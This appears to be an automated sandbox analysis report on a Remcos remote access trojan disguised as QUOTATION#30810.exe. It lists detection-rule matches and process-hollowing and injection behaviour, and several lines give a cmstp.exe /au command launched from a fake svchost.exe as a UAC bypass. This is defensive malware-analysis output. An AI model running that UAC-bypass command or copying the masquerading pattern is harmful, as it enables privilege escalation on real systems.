                        Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: svchost.exe PID: 2772, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: svchost.exe PID: 5880, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: csc.exe PID: 6408, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: ngen.exe PID: 1112, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: initial sampleStatic PE information: Filename: QUOTATION#30810.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess Stats: CPU usage > 49%
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FFB4AF9C9A8 NtUnmapViewOfSection,VirtualAllocEx,9_2_00007FFB4AF9C9A8
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FFB4AF9E3DA NtUnmapViewOfSection,9_2_00007FFB4AF9E3DA
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FFB4AF9CA47 NtUnmapViewOfSection,9_2_00007FFB4AF9CA47
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FFB4AF9CA83 NtUnmapViewOfSection,9_2_00007FFB4AF9CA83
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00007FFB4AF9C9A8 NtUnmapViewOfSection,VirtualAllocEx,11_2_00007FFB4AF9C9A8
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00007FFB4AF9E3DA NtUnmapViewOfSection,11_2_00007FFB4AF9E3DA
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00007FFB4AF9CA47 NtUnmapViewOfSection,11_2_00007FFB4AF9CA47
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00007FFB4AF9CA83 NtUnmapViewOfSection,11_2_00007FFB4AF9CA83
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,32_2_0040DD85
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_00401806 NtdllDefWindowProc_W,32_2_00401806
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_004018C0 NtdllDefWindowProc_W,32_2_004018C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_004016FD NtdllDefWindowProc_A,37_2_004016FD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_004017B7 NtdllDefWindowProc_A,37_2_004017B7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_00402CAC NtdllDefWindowProc_A,39_2_00402CAC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_00402D66 NtdllDefWindowProc_A,39_2_00402D66
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 40_2_00007FFB4AF9E3DA NtUnmapViewOfSection,40_2_00007FFB4AF9E3DA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,26_2_004167B4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,45_2_004167B4
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeCode function: 0_2_00007FFB4AFA4C3B0_2_00007FFB4AFA4C3B
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeCode function: 0_2_00007FFB4AF90AA90_2_00007FFB4AF90AA9
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeCode function: 0_2_00007FFB4AF9BEE10_2_00007FFB4AF9BEE1
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeCode function: 0_2_00007FFB4AF9BB000_2_00007FFB4AF9BB00
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeCode function: 0_2_00007FFB4AFA3B6D0_2_00007FFB4AFA3B6D
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeCode function: 0_2_00007FFB4AF943980_2_00007FFB4AF94398
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeCode function: 0_2_00007FFB4AF9EE790_2_00007FFB4AF9EE79
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeCode function: 0_2_00007FFB4AF989800_2_00007FFB4AF98980
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeCode function: 0_2_00007FFB4AF9146F0_2_00007FFB4AF9146F
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeCode function: 0_2_00007FFB4AFA4C940_2_00007FFB4AFA4C94
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeCode function: 0_2_00007FFB4AF943900_2_00007FFB4AF94390
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FFB4AF9A70E9_2_00007FFB4AF9A70E
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FFB4AF80AA99_2_00007FFB4AF80AA9
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FFB4AF8146F9_2_00007FFB4AF8146F
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FFB4AF8EE799_2_00007FFB4AF8EE79
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FFB4AF8D2DA9_2_00007FFB4AF8D2DA
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FFB4AF8BEE19_2_00007FFB4AF8BEE1
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FFB4AF8BB009_2_00007FFB4AF8BB00
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FFB4AF8DD739_2_00007FFB4AF8DD73
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00007FFB4AF80AA911_2_00007FFB4AF80AA9
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00007FFB4AF8146F11_2_00007FFB4AF8146F
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00007FFB4AF94C3B11_2_00007FFB4AF94C3B
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00007FFB4AF8BEE111_2_00007FFB4AF8BEE1
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00007FFB4AF8BB0011_2_00007FFB4AF8BB00
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00007FFB4AF93B6D11_2_00007FFB4AF93B6D
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00007FFB4AF989CC11_2_00007FFB4AF989CC
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00007FFB4AF9AE4E11_2_00007FFB4AF9AE4E
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00007FFB4AF8EE7911_2_00007FFB4AF8EE79
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00007FFB4AF94C9411_2_00007FFB4AF94C94
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 16_2_00007FFB4AF90AA916_2_00007FFB4AF90AA9
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 16_2_00007FFB4AF9146F16_2_00007FFB4AF9146F
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 16_2_00007FFB4AFA993516_2_00007FFB4AFA9935
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 16_2_00007FFB4AF9EE7916_2_00007FFB4AF9EE79
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 16_2_00007FFB4AF9BEE116_2_00007FFB4AF9BEE1
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 16_2_00007FFB4AF9BB0016_2_00007FFB4AF9BB00
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 16_2_00007FFB4AF9898816_2_00007FFB4AF98988
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 16_2_00007FFB4AF9898016_2_00007FFB4AF98980
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 16_2_00007FFB4AFA052A16_2_00007FFB4AFA052A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 20_2_1001719420_2_10017194
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 20_2_1000B5C120_2_1000B5C1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0043E0CC26_2_0043E0CC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0041F0FA26_2_0041F0FA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0045415926_2_00454159
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0043816826_2_00438168
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_004461F026_2_004461F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0043E2FB26_2_0043E2FB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0045332B26_2_0045332B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0042739D26_2_0042739D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_004374E626_2_004374E6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0043E55826_2_0043E558
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0043877026_2_00438770
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_004378FE26_2_004378FE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0043394626_2_00433946
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0044D9C926_2_0044D9C9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00427A4626_2_00427A46
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0041DB6226_2_0041DB62
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00427BAF26_2_00427BAF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00437D3326_2_00437D33
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00435E5E26_2_00435E5E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00426E0E26_2_00426E0E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0043DE9D26_2_0043DE9D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00413FCA26_2_00413FCA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00436FEA26_2_00436FEA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0044B04032_2_0044B040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0043610D32_2_0043610D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0044731032_2_00447310
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0044A49032_2_0044A490
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0040755A32_2_0040755A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0043C56032_2_0043C560
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0044B61032_2_0044B610
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0044D6C032_2_0044D6C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_004476F032_2_004476F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0044B87032_2_0044B870
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0044081D32_2_0044081D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0041495732_2_00414957
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_004079EE32_2_004079EE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_00407AEB32_2_00407AEB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0044AA8032_2_0044AA80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_00412AA932_2_00412AA9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_00404B7432_2_00404B74
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_00404B0332_2_00404B03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0044BBD832_2_0044BBD8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_00404BE532_2_00404BE5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_00404C7632_2_00404C76
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_00415CFE32_2_00415CFE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_00416D7232_2_00416D72
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_00446D3032_2_00446D30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_00446D8B32_2_00446D8B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_00406E8F32_2_00406E8F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_0040503837_2_00405038
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_0041208C37_2_0041208C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_004050A937_2_004050A9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_0040511A37_2_0040511A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_0043C13A37_2_0043C13A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_004051AB37_2_004051AB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_0044930037_2_00449300
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_0040D32237_2_0040D322
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_0044A4F037_2_0044A4F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_0043A5AB37_2_0043A5AB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_0041363137_2_00413631
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_0044669037_2_00446690
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_0044A73037_2_0044A730
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_004398D837_2_004398D8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_004498E037_2_004498E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_0044A88637_2_0044A886
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_0043DA0937_2_0043DA09
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_00438D5E37_2_00438D5E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_00449ED037_2_00449ED0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_0041FE8337_2_0041FE83
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_00430F5437_2_00430F54
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_004050C239_2_004050C2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_004014AB39_2_004014AB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_0040513339_2_00405133
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_004051A439_2_004051A4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_0040124639_2_00401246
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_0040CA4639_2_0040CA46
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_0040523539_2_00405235
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_004032C839_2_004032C8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_0040168939_2_00401689
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_00402F6039_2_00402F60
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 40_2_00007FFB4AF8EE7940_2_00007FFB4AF8EE79
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 40_2_00007FFB4AF8D2DA40_2_00007FFB4AF8D2DA
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 40_2_00007FFB4AF8BEE140_2_00007FFB4AF8BEE1
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 40_2_00007FFB4AF8BB0040_2_00007FFB4AF8BB00
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 40_2_00007FFB4AF90D6940_2_00007FFB4AF90D69
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 40_2_00007FFB4AF8DD7340_2_00007FFB4AF8DD73
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 40_2_00007FFB4AF80AA940_2_00007FFB4AF80AA9
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 40_2_00007FFB4AF8146F40_2_00007FFB4AF8146F
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 40_2_00007FFB4AF9AB4940_2_00007FFB4AF9AB49
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 42_2_00007FFB4AF90AA942_2_00007FFB4AF90AA9
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 42_2_00007FFB4AF9146F42_2_00007FFB4AF9146F
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 42_2_00007FFB4AF9EE7942_2_00007FFB4AF9EE79
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 42_2_00007FFB4AF9D2DA42_2_00007FFB4AF9D2DA
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 42_2_00007FFB4AF9BEE142_2_00007FFB4AF9BEE1
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 42_2_00007FFB4AF9BB0042_2_00007FFB4AF9BB00
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 42_2_00007FFB4AFA0D6942_2_00007FFB4AFA0D69
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 42_2_00007FFB4AF9DD7342_2_00007FFB4AF9DD73
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 42_2_00007FFB4AFAA53242_2_00007FFB4AFAA532
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0043E0CC45_2_0043E0CC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0041F0FA45_2_0041F0FA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0045415945_2_00454159
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0043816845_2_00438168
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_004461F045_2_004461F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0043E2FB45_2_0043E2FB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0045332B45_2_0045332B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0042739D45_2_0042739D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_004374E645_2_004374E6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0043E55845_2_0043E558
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0043877045_2_00438770
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_004378FE45_2_004378FE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0043394645_2_00433946
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0044D9C945_2_0044D9C9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_00427A4645_2_00427A46
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0041DB6245_2_0041DB62
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_00427BAF45_2_00427BAF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_00437D3345_2_00437D33
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_00435E5E45_2_00435E5E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_00426E0E45_2_00426E0E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0043DE9D45_2_0043DE9D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_00413FCA45_2_00413FCA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_00436FEA45_2_00436FEA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 004169A7 appears 87 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0044DB70 appears 41 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 004165FF appears 35 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 00422297 appears 42 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 00444B5A appears 37 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 00413025 appears 79 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 00416760 appears 69 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 00434E10 appears 54 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 00402093 appears 50 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 00434770 appears 41 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 00401E65 appears 34 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: String function: 00434E10 appears 54 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: String function: 00402093 appears 50 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: String function: 00434770 appears 41 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: String function: 00401E65 appears 34 times
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 5864 -ip 5864
                        Source: QUOTATION#30810.exeStatic PE information: No import functions for PE file found
                        Source: svchost.exe.0.drStatic PE information: No import functions for PE file found
                        Source: QUOTATION#30810.exe, 00000000.00000000.1537975574.000001FCF8318000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUnuvinipiH vs QUOTATION#30810.exe
                        Source: QUOTATION#30810.exeBinary or memory string: OriginalFilenameUnuvinipiH vs QUOTATION#30810.exe
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\macatsxh.inf
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\54bmrp0l.inf
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\xrlumlnf.inf
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\macatsxh.infJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\54bmrp0l.inf
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\xrlumlnf.inf
                        Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
